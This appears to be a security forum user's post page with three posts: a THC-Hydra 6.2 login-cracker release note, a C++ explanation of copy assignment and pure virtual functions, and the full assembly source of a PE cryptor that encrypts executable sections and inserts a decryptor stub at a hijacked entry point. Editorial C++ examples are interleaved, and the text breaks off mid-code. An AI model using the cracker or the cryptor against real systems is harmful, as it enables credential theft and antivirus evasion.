Nytro

Everything posted by Nytro

  1. THC-Hydra 6.2

THC-Hydra: a very fast network logon cracker which supports many different services. Have a look at the feature sets and services coverage page - including a speed comparison against ncrack and medusa!

Last update 2011-04-06

[0x00] News and Changelog

Hydra is now over 10 years old! Yeah! Good news: hydra is now co-maintained by David Maciejak @ gmail (dot) com, thanks a lot! Hydra is made available under GPLv3 with a special OpenSSL license expansion. No more Windows .exe cygwin port. Too many clueless people hassled me why hydra.exe does not work for them when they double-click on it ... duh. Check out the feature sets and services coverage page - including a speed comparison against ncrack and medusa (yes, we win). It was tested to work on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX.

CHANGELOG for 6.2
=================
* Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files)
* New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support
* New module: IRC is not dead! Use it to find the general server password and /oper credentials
* Added man pages from debian maintainers
* Add support for new syntax: ://[:][/]
* Add TLS support for SIP
* Add SCRAM-SHA1 auth to IMAP module
* Add module usage help (-U)
* Add support for RFC 4013: Internationalized Strings in SASL ("SASLPrep")
* Add SASL + TLS support for NNTP
* Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module
* Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah
* Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap
* Rename smtpauth module to smtp
* Forgot to rename ssh2 to ssh in xhydra, fixed
* Fix SASL PLAIN auth method issue
* Bugfix SASL DIGEST-MD5, response could be wrong on 64bit systems
* Bugfix rlogin and rsh module, some auth failures could not be detected accurately
* Add SSL support for VMware Authentication Daemon module
* Bugfix CVS module, working now
* Bugfix for Telnet module when line mode is not available

Details: http://www.thc.org/thc-hydra/
Download: http://www.thc.org/download.php?t=r&f=hydra-6.2-src.tar.gz
  2. Very nicely explained, dumbed down. It's made more for my colleagues, who aren't exactly passionate about this kind of thing. But there's one thing I didn't quite get ... when you overload an operator .. e.g. = and you do a = b; shouldn't it be exactly like a.operator=( and the function header be void operator=(MyClass obj), with the assignment done member by member (for the data ... usually the private ones) or something like *this = b; ?

When you have Obiect a, b; and want to copy like this: a = b? I think that's what you mean. It's simple. If you don't define the copy constructor Obiect(Obiect &operand) yourself and don't overload the = operator for an object-type parameter, i.e. Obiect& Obiect::operator = (Obiect &), which does roughly the same thing (the former being called when the object is initialized, in its declaration), then the implicit ones get defined and a bit-by-bit copy is made from "b" into "a". The problem appears when you work with pointers. Say you store a character string in a class: char *p_sir; With a bit-by-bit assignment, the pointer in "a" will point to the same address as the pointer in "b". That is, the pointer's address gets copied and both objects will effectively have the same string. If in the meantime you destroy object "b" and free the memory occupied by the string, it can no longer be used in "a" either, because it is the same string. The solution is that in the copy constructor and in the overload of = taking an object of the current class as parameter (passed by reference), you allocate space for the string in "a" and copy "b"'s string into it, so that you have 2 distinct strings.

Now let's get to what interests you. Although it looks odd, the = operator returns a value. If it didn't return one, you couldn't use expressions like a = b = c;, several chained expressions. In this expression, since the = operator is evaluated right to left, first b takes the value of c, then the expression b = c returns b, which is then copied into a. To be able to do this with objects, the overload of = has to return a reference to the current object. That is:

Obiect& Obiect::operator = (Obiect &operand_2)
{
    /* Copying, in which you put the wanted values into the current object,
       which you then return, so it can be used further */
    return *this;
}

That is, the current object, given by *this, is the first operand, and the second operand is the parameter. You copy from the parameter into *this whatever you need and return *this. In short, a = b returns a.

And one last thing I'm unsure about ... I didn't quite understand why, for some virtual functions, a const or some data type is added after the header when they are defined.

Const is used, in this case, to define constant member functions. The idea behind them is simple: these functions will not be allowed to modify the object's state. They are defined to guarantee this, by adding a "const" after the () holding the function's parameters. But I think you mean pure virtual functions, which have an "= 0;" at the end and are not defined. Of course, that = 0 can be, and often preferably is, preceded by a "const". That's a different matter. They are used to define an abstract class, a class that cannot be instantiated and that forces the classes inheriting from it to implement those functions. I think that's what you wanted to know; if anything is unclear, post.
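The copy semantics the reply describes, as an added example that is not code from the post: a class owning a heap-allocated char* (the post's p_sir) with a deep-copying copy constructor and an operator= that returns *this, plus a const member function and an abstract class with a pure virtual function. The class names Sir, Forma and Dreptunghi are assumptions chosen for the illustration.

```cpp
// Added example, not from the original post: deep copy for a class that owns a
// char* (the post's p_sir), operator= returning *this so that a = b = c chains,
// a const member function, and an abstract class with a pure virtual function.
// Class names are assumptions chosen for this illustration.
#include <cstddef>
#include <cstring>
#include <string>

class Sir {
public:
    explicit Sir(const char* s = "") : p_sir(dup(s)) {}

    // Copy constructor: runs at initialization (Sir a = b; or Sir a(b);).
    // Allocates its own buffer instead of sharing b's pointer.
    Sir(const Sir& other) : p_sir(dup(other.p_sir)) {}

    // Copy assignment: runs for a = b; on an already-constructed a.
    // *this is the left operand, `other` the right one; returning a reference
    // to *this is what makes a = b = c legal.
    Sir& operator=(const Sir& other) {
        if (this != &other) {               // a = a must not free its own buffer
            char* fresh = dup(other.p_sir); // allocate first: if this throws, *this is untouched
            delete[] p_sir;
            p_sir = fresh;
        }
        return *this;
    }

    ~Sir() { delete[] p_sir; }              // each object frees only its own buffer

    // const after the parameter list: callable on a const Sir, cannot modify members.
    const char* c_str() const { return p_sir; }
    std::size_t length() const { return std::strlen(p_sir); }
    bool sharesBufferWith(const Sir& other) const { return p_sir == other.p_sir; }

private:
    static char* dup(const char* s) {
        std::size_t n = std::strlen(s) + 1;
        char* p = new char[n];
        std::memcpy(p, s, n);
        return p;
    }
    char* p_sir;                            // owned, heap-allocated C string
};

// Abstract class: "= 0" makes arie() pure virtual, so Forma cannot be
// instantiated and every derived class must implement arie(); the const
// before "= 0" says the implementation may not change the object.
class Forma {
public:
    virtual ~Forma() {}
    virtual double arie() const = 0;
};

class Dreptunghi : public Forma {
public:
    Dreptunghi(double l, double h) : l_(l), h_(h) {}
    double arie() const override { return l_ * h_; }
private:
    double l_, h_;
};

// Chained assignment, then the source object goes out of scope: with a deep
// copy the survivor still owns a valid string. Returns "ALIASED" if any two
// objects ended up sharing one buffer (the bug the post warns about).
std::string demoCopiere() {
    Sir c("abc");
    Sir a, b;
    a = b = c;                              // evaluated right to left: b = c returns b, then a = b
    if (a.sharesBufferWith(b) || b.sharesBufferWith(c)) return "ALIASED";
    {
        Sir temp("temporar");
        a = temp;                           // a gets its own copy of "temporar"
    }                                       // temp is destroyed and its buffer freed here
    return a.c_str();                       // still valid: a never pointed into temp's buffer
}

double demoAbstract() {
    Dreptunghi d(3.0, 4.0);
    const Forma& f = d;                     // through a const reference only const members are callable
    return f.arie();
}
```

With the compiler-generated copy instead of the two hand-written ones, `a = temp` would copy the pointer, the destructor of `temp` would free it, and `a.c_str()` would read freed memory; with a destructor that frees, the same buffer would also be freed twice. The self-assignment check and the allocate-before-free order are the two details that are easy to get wrong in operator=.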
  3. Simple PE Cryptor

Demonstrates how to encrypt the code and data sections of any PE file. Full source code included. This is a very rough beta.

include w32.inc
include console.inc
include message.inc
include imghdr.inc

extrn GetSystemTime:proc
extrn VirtualAlloc:proc
extrn VirtualFree:proc

.DATA
file_hnd      dd 0                          ; handle to opened file
mem_offset    dd 0                          ; address of allocated memory
obj_offset    dd 0                          ; offset of object (section) table, relative to pe header
peh_offset    dd 0                          ; address of pe header
curr_disp     dd 0                          ; displacement
rsrc_count    dd 0                          ; number of resource types
num_rsrc      dd 0                          ; total number of resources
rsrc_head     dd 0                          ; size of resource header
sys_time      SYSTEMTIME <0>                ; used in getsystime
pe_h          IMAGE_NT_HEADERS <0>          ; pe header struc
obj_table     IMAGE_SECTION_HEADER 0Fh dup (<0>) ; section table struc
header_len    equ size pe_h + size obj_table ; length of header
decryptor_len equ decryptor_end - decryptor_start ; length of decryptor
it_len        equ it_end - k32_original     ; length of import table inside decryptor
crypt_flag    db 00,10,13                   ; for stat display
new_section:
obj_name      db '.hayras',0                ; section name
virt_size     dd 0                          ; virtual size
virt_addr     dd 0                          ; rva
raw_size      dd 0                          ; size of file
raw_offset    dd 0                          ; offset in file
unused        dd 0,0,0                      ; others
obj_flags     dd 0E0000020h                 ; flag (r/w/c/x)

.CODE
start:
; ----- show intro ------------------------------------------------------------
        call    init_console                ; initialize console
        push    logo_l                      ; show this message
        push    offset logo                 ;
        call    write_console               ; write to screen
; ----- get command line ------------------------------------------------------
        call    GetCommandLineA
        mov     edi,eax                     ; address of name
        mov     ecx, -1                     ; counter
        mov     al, 0                       ; search byte
        push    edi                         ; save for later
        repnz   scasb                       ; search for end of name
        not     ecx                         ; number of bytes read
        pop     edi                         ; address of name
        mov     al, 20h                     ; search byte
        repnz   scasb                       ; get length of file name
        dec     ecx                         ; skip extra space
        test    ecx,ecx                     ; something there
        jnz     open_file
no_commandline:
        push    no_cmd_l
        push    offset no_cmd
        call    write_console
        jmp     quit
; ----- open file -------------------------------------------------------------
open_file:
        push    0                           ; hTemplateFile
        push    FILE_ATTRIBUTE_NORMAL       ; dwFlagsAndAttribute
        push    OPEN_EXISTING               ; dwCreationDistribution
        push    0                           ; lpSecurityAttributes
        push    0                           ; dwShareMode
        push    GENERIC_READ + GENERIC_WRITE ; dwDesiredAccess
        push    edi                         ; lpFileName
        call    CreateFile
        cmp     eax, INVALID_HANDLE_VALUE   ; returned file handle
        jz      file_not_found
        mov     file_hnd, eax               ; save file handle
; ----- get offset of pe header -----------------------------------------------
        push    FILE_BEGIN                  ; start of file
        push    0                           ; lpDistanceToMoveHigh
        push    3Ch                         ; number of bytes to move (location of offset to pe header)
        push    file_hnd                    ; handle of file
        call    SetFilePointer
        push    0                           ; lpOverlapped
        push    offset bytes_read           ; address of number of bytes read
        push    4                           ; number of bytes to read
        push    offset peh_offset           ; address to store bytes read (offset to pe header)
        push    file_hnd                    ; handle of file
        call    ReadFile
; ----- read header to pe struc -----------------------------------------------
        push    0
        push    0
        push    peh_offset
        push    file_hnd
        call    SetFilePointer
        push    0
        push    offset bytes_read
        push    header_len
        push    offset pe_h
        push    file_hnd
        call    ReadFile
; ----- check pe signature ----------------------------------------------------
        cmp     [pe_h.Signature], IMAGE_NT_SIGNATURE ; check for 'PE'
        jnz     not_valid_pe
        call    show_some_info              ; display some stats
; ----- get offset to object table --------------------------------------------
        movzx   eax, [pe_h.SizeOfOptionalHeader] ; size of optional header
        add     eax, 18h                    ; offset to object table
        mov     obj_offset, eax
; ----- check for space in object table ---------------------------------------
        movzx   eax, [pe_h.NumberOfSections] ; number of sections
        inc     eax                         ; add 1 for new section
        mov     ecx, 28h                    ; size of section
        mul     ecx                         ; num sections * 28h
        add     eax, obj_offset             ; offset of object table
        add     eax, peh_offset             ; offset to pe header
        cmp     eax, [pe_h.SizeOfHeaders]
        jg      no_space
; ----- store rva of import section -------------------------------------------
        mov     eax, [pe_h.DataDirectory.(8).VirtualAddress]
        mov     it_address, eax
; ----- generate encryption key -----------------------------------------------
        push    offset sys_time             ; SYSTEMTIME struc
        call    GetSystemTime
        movzx   eax, [sys_time.st_wMilliseconds] ; get millisecond (word)
        mov     key, al                     ; save low byte as encryption key
; ----- encrypt objects -------------------------------------------------------
        push    sec_label_l                 ; header for section display
        push    offset sec_label
        call    write_console
        mov     esi, offset obj_table       ; start of section table
        movzx   ecx, [pe_h.NumberOfSections] ; number of sections as counter
next_obj:
        call    encrypt_objects             ; encrypt each section
        call    show_stats                  ; display some stats
        add     esi, 28h                    ; next section in table
        loop    next_obj
; ----- locate/add decryptor object in table ----------------------------------
        mov     esi, offset obj_table       ; start of section table
        movzx   eax, [pe_h.NumberOfSections] ; number of sections
        mov     ecx, 28h                    ; size of section header
        mul     ecx                         ; number of sections * 28h
        add     esi, eax                    ; end of section headers
        inc     [pe_h.NumberOfSections]     ; add our section
        mov     edi, offset new_section
        xchg    edi, esi
; ----- calculate rva (aligned) -----------------------------------------------
        mov     eax, [edi-28h+8]            ; (rva+size)/align of the last section
        add     eax, [edi-28h+0Ch]
        mov     ecx, [pe_h.SectionAlignment]
        cdq
        div     ecx
        test    edx, edx
        jz      section_aligned
        inc     eax
section_aligned:
        mul     ecx
        mov     virt_addr, eax
        mov     decr_rva, eax
; ----- calculate raw data size (aligned) -------------------------------------
        mov     eax, decryptor_len
        mov     ecx, [pe_h.FileAlignment]
        div     ecx
        test    edx, edx
        jz      file_aligned
        inc     eax
file_aligned:
        mul     ecx
        mov     [raw_size], eax
; ----- calculate virtual size (aligned) --------------------------------------
        mov     eax, decryptor_len
        mov     ecx, [pe_h.SectionAlignment]
        div     ecx
        test    edx, edx
        jz      sect_aligned
        inc     eax
sect_aligned:
        mul     ecx
        mov     virt_size, eax
; ----- calculate file offset -------------------------------------------------
        mov     eax, [edi-28h+14h]          ; PointerToRawData + SizeOfRawData of the last section
        add     eax, [edi-28h+10h]
        mov     raw_offset, eax
; ----- calculate rva/size of import section ----------------------------------
        mov     eax, k32_original-decryptor_start
        add     eax, decr_rva               ; add rva of decryptor
        mov     [pe_h.DataDirectory.(8).VirtualAddress], eax ; it rva in data dir
        mov     [pe_h.DataDirectory.(8).Size], it_len        ; it size
        add     dword ptr k32_original, eax ; convert to rva
        add     dword ptr k32_dll, eax      ;
        add     dword ptr k32_first, eax    ;
        add     dword ptr func_k32, eax     ;
        add     dword ptr [func_k32+4], eax ;
        add     dword ptr [func_k32+8], eax ;
        add     dword ptr [func_k32+0Ch], eax ;
        add     dword ptr getproc, eax      ;
        add     dword ptr getmod, eax       ;
        add     dword ptr loadlib, eax      ;
        add     dword ptr u32_original, eax ;
        add     dword ptr u32_dll, eax      ;
        add     dword ptr u32_first, eax    ;
        add     dword ptr func_u32, eax     ;
        add     dword ptr msgbox, eax       ;
        add     dword ptr cap_addr, eax     ;
        add     dword ptr msg_addr, eax     ;
; ----- adjust size of image (aligned) ----------------------------------------
        mov     eax, virt_size
        add     eax, [pe_h.SizeOfImage]
        mov     ecx, [pe_h.SectionAlignment]
        div     ecx
        test    edx, edx
        jz      image_aligned
        inc     eax
image_aligned:
        mul     ecx
        mov     [pe_h.SizeOfImage], eax
; ----- copy data to decryptor section ----------------------------------------
        mov     ecx, 28h
        rep     movsb
; ----- store new entry point rva ---------------------------------------------
        mov     eax, dword ptr virt_addr
        mov     ebx, dword ptr [pe_h.AddressOfEntryPoint]
        mov     [pe_h.AddressOfEntryPoint], eax
        mov     original_erva, ebx
; ----- rewrite header --------------------------------------------------------
        push    0
        push    0
        push    peh_offset
        push    file_hnd
        call    SetFilePointer
        push    0
        push    offset bytes_read
        push    header_len
        push    offset pe_h file_hnd
        call    WriteFile
; ----- write decryptor -------------------------------------------------------
        push    0
        push    0
        push    raw_offset
        push    file_hnd
        call    SetFilePointer
        push    0
        push    offset bytes_read
        push    raw_size
        push    offset decryptor_start
        push    file_hnd
        call    WriteFile
        push    done_l
        push    offset done
        call    write_console
        jmp     close_hnd
; ----- some error messages ---------------------------------------------------
no_space:
        push    no_o_space_l
        push    offset no_o_space
        call    write_console
        jmp     close_hnd
not_valid_pe:
        push    not_pe_l
        push    offset not_pe
        call    write_console
        jmp     close_hnd
file_not_found:
        push    file_nf_l
        push    offset file_nf
        call    write_console
        jmp     quit
; ----- finished, lets close --------------------------------------------------
close_hnd:
        push    file_hnd                    ; handle of file
        call    CloseHandle
quit:
        push    0
        call    ExitProcess

;------------------------------------------------------------------------------
show_some_info proc
;------------------------------------------------------------------------------
        mov     eax, [pe_h.SizeOfCode]
        push    eax eax
        movzx   eax, [pe_h.NumberOfSections]
        push    eax offset num_secs
        call    write_hex
        mov     eax, [pe_h.SizeOfInitializedData]
        push    eax eax
        mov     eax, [pe_h.ImageBase]
        push    eax offset img_base
        call    write_hex
        mov     eax, [pe_h.SizeOfUninitializedData]
        push    eax eax
        mov     eax, [pe_h.AddressOfEntryPoint]
        push    eax offset ep_rva
        call    write_hex
        mov     eax, [pe_h.SectionAlignment]
        push    eax eax
        mov     eax, [pe_h.SizeOfImage]
        push    eax offset size_img
        call    write_hex
        mov     eax, [pe_h.FileAlignment]
        push    eax eax
        mov     eax, [pe_h.SizeOfHeaders]
        push    eax offset size_head
        call    write_hex
        movzx   eax, [pe_h.MinorLinkerVersion]
        push    eax
        movzx   eax, [pe_h.MajorLinkerVersion]
        push    eax
        mov     eax, [pe_h.BaseOfCode]
        push    eax offset base_code
        call    write_hex
        movzx   eax, [pe_h.DllCharacteristics]
        push    eax eax
        mov     eax, [pe_h.BaseOfData]
        push    eax offset base_data
        call    write_hex
        ret
endp

;------------------------------------------------------------------------------
show_stats proc
;------------------------------------------------------------------------------
        push    8 esi
        call    write_console
        push    dword ptr [esi.SVirtualSize]
        push    dword ptr [esi.SVirtualAddress]
        push    dword ptr [esi.SizeOfRawData]
        push    dword ptr [esi.PointerToRawData]
        push    dword ptr [esi.SFlags]
        push    offset sec_status
        call    write_stat
        push    3 offset crypt_flag
        call    write_console
        ret
endp

;------------------------------------------------------------------------------
encrypt_objects proc
;------------------------------------------------------------------------------
        pusha
        cmp     [esi], 'adr.'               ; skip .rdata
        jz      set_flag
        cmp     [esi], 'ade.'               ; skip .edata
        jz      set_flag
        cmp     [esi], 'ler.'               ; skip .reloc
        jz      set_flag
        cmp     [esi], 'slt.'               ; skip .tls
        jz      set_flag
        cmp     dword ptr [esi.SizeOfRawData], 0
        jz      set_flag
        jmp     proceed
set_flag:
        mov     crypt_flag, ' '
        jmp     no_encrypt
; ----- allocate memory -------------------------------------------------------
proceed:
        push    PAGE_READWRITE
        push    MEM_COMMIT
        push    [esi.SizeOfRawData]
        push    0
        call    VirtualAlloc
        mov     mem_offset, eax
; ----- read section to encrypt -----------------------------------------------
        push    0
        push    0
        push    [esi.PointerToRawData]
        push    file_hnd
        call    SetFilePointer
        push    0
        push    offset bytes_read
        push    [esi.SizeOfRawData]
        push    mem_offset
        push    file_hnd
        call    ReadFile
        cmp     [esi], 'rsr.'
        jnz     not_rsrc
; ----- resource routine ------------------------------------------------------
        mov     edi, mem_offset             ; start of rsrc buffer
        mov     edx, mem_offset
        movzx   ecx, word ptr [edi.IRD_NumberOfNamedEntries] ; rsrc with names
        add     cx, [edi.IRD_NumberOfIdEntries] ; rsrc with id
        mov     rsrc_count, ecx             ; number of rsrc types
        add     edx, 10h                    ; skip root
next_resource:                              ; num rsrc types as counter
        mov     eax, [edx+4]                ; offset to subdir
        and     eax, 0FFFFFFFh              ; mask offset
        add     eax, edi                    ; address of subdir
        movzx   ebx, word ptr [eax.IRD_NumberOfNamedEntries]
        add     bx, [eax.IRD_NumberOfIdEntries]
        add     num_rsrc, ebx
        cmp     [eax.IRD_NumberOfNamedEntries], 0
        jz      not_named
        push    ecx eax
        movzx   ecx, [eax.IRD_NumberOfNamedEntries]
        add     eax, 10h
next_entry:
        movzx   ebx, word ptr [eax]
        add     ebx, edi
        movzx   ebx, word ptr [ebx]
        imul    ebx, 2
        add     ebx, 2
        add     rsrc_head, ebx
        add     eax, 8
        loop    next_entry
        pop     eax ecx
not_named:
        add     edx, 8                      ; next resource type
        loop    next_resource
        mov     ecx, 30h
        mov     eax, num_rsrc               ; total number of resources
        mul     ecx                         ; 30h * num of res
        add     rsrc_head, eax
        mov     ecx, 18h
        mov     eax, rsrc_count             ; 18h * number of res types
        mul     ecx
        add     rsrc_head, eax              ; add em both
        add     rsrc_head, 10h              ; add size of main struc
        mov     eax, rsrc_head              ; length of resource header
        add     mem_offset, eax             ; skip the res header
        mov     edi, mem_offset
        mov     ecx, [esi.SizeOfRawData]    ; size as counter
        sub     ecx, [rsrc_head]
        mov     al, key
res_encrypt:
        sub     byte ptr [edi], al          ; encrypt
        inc     al
        inc     edi                         ; next byte
        loop    res_encrypt
        mov     eax, [esi.PointerToRawData] ; get file offset
        add     eax, rsrc_head              ; skip resource header
        push    0
        push    0
        push    eax
        push    file_hnd
        call    SetFilePointer
        mov     eax, [esi.SizeOfRawData]
        sub     eax, rsrc_head              ; skip resource header
        push    0
        push    offset bytes_read
        push    eax
        push    mem_offset
        push    file_hnd
        call    WriteFile                   ; write it
        mov     edi, [curr_disp]
        mov     eax, [esi+SVirtualAddress]
        add     eax, rsrc_head              ; skip resource header
        mov     [object_rva+edi], eax       ; save rva to decryptor
        mov     eax, [esi.SizeOfRawData]
        sub     eax, rsrc_head              ; don't include rsrc header
        mov     [object_size+edi], eax      ; save size to decryptor
        jmp     release_mem
; ----- store rva/size to decryptor -------------------------------------------
not_rsrc:
        mov     edi, [curr_disp]
        mov     eax, [esi+SVirtualAddress]
        mov     [object_rva+edi], eax       ; save rva to decryptor
        mov     eax, [esi.SizeOfRawData]
        mov     [object_size+edi], eax      ; save size to decryptor
        mov     edi, mem_offset             ; start of buffer
        mov     ecx, [esi.SizeOfRawData]    ; size as counter
        mov     al, key                     ; get key
encrypt:
        sub     byte ptr [edi], al          ; encrypt
        inc     al
        inc     edi                         ; next byte
        loop    encrypt
; ----- write encrypted section -----------------------------------------------
        push    0
        push    0
        push    [esi.PointerToRawData]      ; point to
        push    file_hnd
        call    SetFilePointer
        push    0
        push    offset bytes_read
        push    [esi.SizeOfRawData]         ; size
        push    mem_offset                  ; start here
        push    file_hnd
        call    WriteFile
; ----- deallocate memory -----------------------------------------------------
release_mem:
        push    MEM_DECOMMIT                ; fdwFreeType
        push    [esi.SizeOfRawData]         ; cbSize
        push    mem_offset                  ; lpvAddress
        call    VirtualFree
; ----- update flags/number of objects ----------------------------------------
        add     [curr_disp], 8              ; update displacement
        inc     byte ptr num_objects        ; update counter
        or      [esi.SFlags], 80000000h     ; enable write bit
        mov     crypt_flag, 0FBh            ; for stat display
no_encrypt:
        popa
        ret
encrypt_objects endp

.DATA
;------------------------------------------------------------------------------
decryptor_start:
        db      '[SPEC]'
        call    delta                       ; get delta offset
delta:
        pop     ebp
        mov     eax, ebp                    ; save for imagebase calculation
        sub     ebp, offset delta           ; ebp = delta offset
        sub     eax, [decr_rva+ebp]         ; decryptor rva
        sub     eax, offset delta-decryptor_start ; calculate current imagebase
        mov     [image_base+ebp], eax       ; store for later
        movzx   esi, [num_objects+ebp]      ; number of sections (use as counter)
        mov     edi, ebp                    ; save delta
next_object:
        mov     ebx, [image_base+ebp]       ; imagebase
        mov     eax, [object_rva+edi]       ; rva of encrypted section
        add     ebx, eax                    ; imagebase+rva=address of section
        mov     ecx, [object_size+edi]      ; size of section (use as counter)
        mov     al, [key+ebp]
decrypt:
        add     byte ptr [ebx], al          ; decrypt
        inc     al
        inc     ebx                         ; next byte
        loop    decrypt
        add     edi, 8                      ; next section
        dec     esi                         ; dec section count
        jnz     next_object                 ; until no more sections
; ----- fix import section ----------------------------------------------------
        mov     edx, [image_base+ebp]       ; get image base
        mov     esi, [it_address+ebp]       ; rva of original import table
        add     esi, edx                    ; address of import table
next_dll:
        mov     eax, [esi+0Ch]              ; rva of dll name
        or      eax, eax                    ; dll name present?
        jz      dll_end
        add     eax, edx                    ; address of dll name
        mov     ebx, eax                    ; save for loadlibrary
        push    eax                         ; push dll name
        call    [getmod+ebp]                ; call GetModuleHandleA
        or      eax, eax                    ; loaded?
        jnz     dll_loaded
        push    ebx                         ; push dll name
        call    [loadlib+ebp]               ; call LoadLibrary
        or      eax, eax                    ; success?
        jnz     dll_loaded
exit_loader:
        mov     edx, [image_base+ebp]       ; get imagebase
        add     [cap_addr+ebp], edx         ; add to offset
        add     [msg_addr+ebp], edx
        push    0                           ; null
        push    [cap_addr+ebp]              ; caption
        push    [msg_addr+ebp]              ; message
        push    0                           ; mb ok
        call    [msgbox+ebp]                ; call MessageBoxA
        push    0
        call    [exitproc+ebp]              ; call ExitProcess
dll_loaded:
        mov     [dll_hnd+ebp], eax          ; save handle
        mov     [func_disp+ebp], 0          ; initialize displacement
next_function:
        mov     edx, [ebp+image_base]       ; imagebase
        mov     eax, [esi]                  ; original first thunk (rva)
        or      eax, eax                    ; is it there?
        jnz     hint_ok
        mov     eax, [esi+10h]              ; no, then check out first thunk
hint_ok:
        add     eax, edx                    ; offset to function name
        add     eax, [func_disp+ebp]        ; displacement (first thunk)
        mov     ebx, [eax]                  ; rva to function name
        mov     edi, [esi+10h]              ; first thunk (iat)
        add     edi, edx                    ; address of iat
        add     edi, [func_disp+ebp]        ; displacement (iat)
        test    ebx, ebx                    ; function present?
        jz      function_end
        test    ebx, 80000000h              ; test for ordinal bit
        jnz     func_ordinal                ; if present, then function is ordinal only
        add     ebx, edx                    ; address of function name
        add     ebx, 2                      ; skip hint
func_ordinal:
        and     ebx, 0FFFFFFFh
        push    ebx                         ; offset of function name or ordinal
        push    dword ptr [ebp+dll_hnd]     ; handle of dll
        call    [getproc+ebp]               ; call GetProcAddress
        or      eax, eax
        jz      exit_loader
        mov     [edi], eax                  ; store address to iat
        add     [func_disp+ebp], 4          ; update displacement
        jmp     next_function
function_end:
        add     esi, 14h                    ; next import descriptor
        mov     edx, [image_base+ebp]       ; image base again
        jmp     next_dll
dll_end:
        mov     eax, [original_erva+ebp]    ; original entry point rva
        add     eax, [image_base+ebp]       ; add imagebase
        jmp     eax                         ; jump to original entry point
;------------------------------------------------------------------------------
        align   4
k32_original  dd func_k32-k32_original      ; original first thunk
              dd 0,0                        ; time/date, forwarder
k32_dll       dd k32-k32_original           ; rva to dll name
k32_first     dd getproc-k32_original       ; first thunk
u32_original  dd func_u32-k32_original      ; same as above, for user32
              dd 0,0
u32_dll       dd u32-k32_original
u32_first     dd msgbox-k32_original
              dd 5 dup (0)                  ; terminate import descriptor
k32           db 'KERNEL32.DLL',0           ; dll to load
func_k32      dd function1-k32_original     ; rva's to function names
              dd function2-k32_original
              dd function3-k32_original
              dd function4-k32_original,0
u32           db 'USER32.DLL',0
func_u32      dd function5-k32_original,0
getproc       dd 0                          ; the iat
getmod        dd 0                          ; the loader patches
loadlib       dd 0                          ; this area
exitproc      dd 0                          ;
msgbox        dd 0
              dd 0                          ; terminator
function1     db 0,0,'GetProcAddress',0     ; function names
function2     db 0,0,'GetModuleHandleA',0
function3     db 0,0,'LoadLibra
ryA',0
function4     db 0,0,'ExitProcess',0
function5     db 0,0,'MessageBoxA',0
        align   4
it_end:
cap_addr      dd caption-k32_original       ; offset to caption
msg_addr      dd message-k32_original       ; offset to message
caption       db 'error',0                  ; generic message
message       db 'loader failed', 0
key           db 0
dll_hnd       dd 0                          ; handle to loaded dll
func_disp     dd 0                          ; displacement in function name & iat
it_address    dd 0                          ; rva of original import section
decr_rva      dd 0                          ; rva of the decryptor
image_base    dd 0                          ; image base
num_objects   db 0                          ; number of encrypted sections
original_erva dd 0                          ; entry point rva
object_rva    dd 0                          ; rva/size of encrypted sections
object_size   dd 0
              dd 20h dup (0)
decryptor_end:
;------------------------------------------------------------------------------
        end start

Download: http://win32assembly.online.fr/files/spec.zip
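The header walk, alignment rounding, section filter and rolling-key byte transform that the cryptor performs in assembly, as an added example in C++ that is not code from the post. It runs over a constructed in-memory PE image rather than a file; the two-section sample layout, the key 0x5A and the function names are assumptions chosen for the illustration. The resource-section special case (keeping the directory header in clear) is not modelled.

```cpp
// Added example, not code from the original post: the header walk, alignment
// rounding, section filter and rolling-key transform of the cryptor, over an
// in-memory PE image. The image is a constructed sample, not a real file;
// field offsets follow the PE/COFF format.
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

typedef std::vector<uint8_t> Image;

struct Section {
    std::string name;
    uint32_t virtualSize, virtualAddress, sizeOfRawData, pointerToRawData, characteristics;
    size_t headerOffset;   // file offset of this IMAGE_SECTION_HEADER
};

static uint16_t rd16(const Image& b, size_t o) { return uint16_t(b[o] | (b[o + 1] << 8)); }
static uint32_t rd32(const Image& b, size_t o) { return rd16(b, o) | (uint32_t(rd16(b, o + 2)) << 16); }
static void wr16(Image& b, size_t o, uint16_t v) { b[o] = uint8_t(v); b[o + 1] = uint8_t(v >> 8); }
static void wr32(Image& b, size_t o, uint32_t v) { wr16(b, o, uint16_t(v)); wr16(b, o + 2, uint16_t(v >> 16)); }

// Round v up to a multiple of a: the div / test edx / inc / mul sequence in the cryptor.
uint32_t alignUp(uint32_t v, uint32_t a) { return a ? (v + a - 1) / a * a : v; }

// e_lfanew -> "PE\0\0" -> COFF header -> section table, which starts 0x18 +
// SizeOfOptionalHeader past the signature, 0x28 bytes per entry.
// Returns an empty vector for anything that is not a sane PE.
std::vector<Section> parseSections(const Image& img) {
    std::vector<Section> out;
    if (img.size() < 0x40 || rd16(img, 0) != 0x5A4D) return out;              // "MZ"
    uint32_t pe = rd32(img, 0x3C);
    if (pe + 0x18 > img.size() || rd32(img, pe) != 0x00004550) return out;    // "PE\0\0"
    uint16_t nsec = rd16(img, pe + 6), optSize = rd16(img, pe + 0x14);
    size_t table = pe + 0x18 + optSize;
    if (table + size_t(nsec) * 0x28 > img.size()) return out;
    for (uint16_t i = 0; i < nsec; ++i) {
        size_t h = table + size_t(i) * 0x28;
        Section s;
        for (size_t k = 0; k < 8 && img[h + k]; ++k) s.name += char(img[h + k]);
        s.virtualSize = rd32(img, h + 0x08);
        s.virtualAddress = rd32(img, h + 0x0C);
        s.sizeOfRawData = rd32(img, h + 0x10);
        s.pointerToRawData = rd32(img, h + 0x14);
        s.characteristics = rd32(img, h + 0x24);
        s.headerOffset = h;
        out.push_back(s);
    }
    return out;
}

// The cryptor's per-byte transform: subtract a key that is incremented after
// every byte (wrapping at 8 bits); the decryptor stub adds the same sequence back.
void rollingKey(uint8_t* p, size_t n, uint8_t key, bool encrypt) {
    for (size_t i = 0; i < n; ++i, ++key)
        p[i] = encrypt ? uint8_t(p[i] - key) : uint8_t(p[i] + key);
}

// Sections the cryptor leaves alone: .rdata, .edata, .reloc, .tls and empty
// ones (the 4-byte name compares at the top of encrypt_objects).
bool shouldEncrypt(const Section& s) {
    static const char* const skip[] = {".rda", ".eda", ".rel", ".tls"};
    if (s.sizeOfRawData == 0) return false;
    for (const char* k : skip)
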